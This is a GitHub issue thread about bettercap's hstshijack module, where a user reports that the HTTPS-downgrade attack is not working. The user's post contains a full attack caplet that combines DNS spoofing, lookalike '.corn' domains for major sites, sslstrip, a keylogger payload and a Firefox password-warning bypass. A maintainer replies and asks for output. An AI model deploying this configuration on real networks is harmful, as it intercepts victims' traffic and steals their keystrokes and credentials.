### ISSUE TITLE
com to corn option is not working :-/

### ISSUE THREAD

**Issue by azamet90** [bettercap/bettercap#773]
im using kali linux and doing this tutorial:
https://sibertehdit.com/bettercap-ile-hstshijack-https-downgrade-saldirisi-nasil-yapilir

but it is not working :-/

all the sites are still https :-/ and i tryed to change the caplet to this but result is same :-/

# Documentation can be found at https://github.com/bettercap/caplets/blob/master/hstshijack/README.md

set hstshijack.log             /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore          *
set hstshijack.targets         twitter.com, *.twitter.com, facebook.com, *.facebook.com, apple.com, *.apple.com, ebay.com, *.ebay.com, www.linkedin.com
set hstshijack.replacements    twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com
#set hstshijack.blockscripts    facebook.com,*.facebook.com
set hstshijack.obfuscate       false
set hstshijack.encode          false
set hstshijack.payloads        *:/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/firefox-bypass-password-warning.js,*.google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.js,google.com:/usr/share/bettercap/caplets/hstshijack/payloads/google.js

set http.proxy.script  /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains  twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com

http.proxy  on
dns.spoof   on

is this tool still working?

**Comment by buffermet** [comment]
The caplet works fine. The tutorial that you followed is wrong, and the caplet you posted here is very broken. You're also not showing any output so all we can do is guess...

Also, you should not remove the sslstrip.js payload because the module does not sslstrip response bodies, the JavaScript payload does.

Read the documentation [here](https://github.com/bettercap/caplets/tree/master/hstshijack).

If you don't know the basics about SSL and HSTS, you should do your own [research](https://www.google.com/search?q=what+is+ssl+and+hsts).

**Comment by azamet90** [comment]
that everything is default only one thing i did put and this is the domains :-/

**Comment by buffermet** [comment]
You didn't use backticks to encapsulate your output, so GitHub's markdown made your caplet look broken.

You are not providing us with any output (as was requested in the issue template which you removed), so we can't help you.
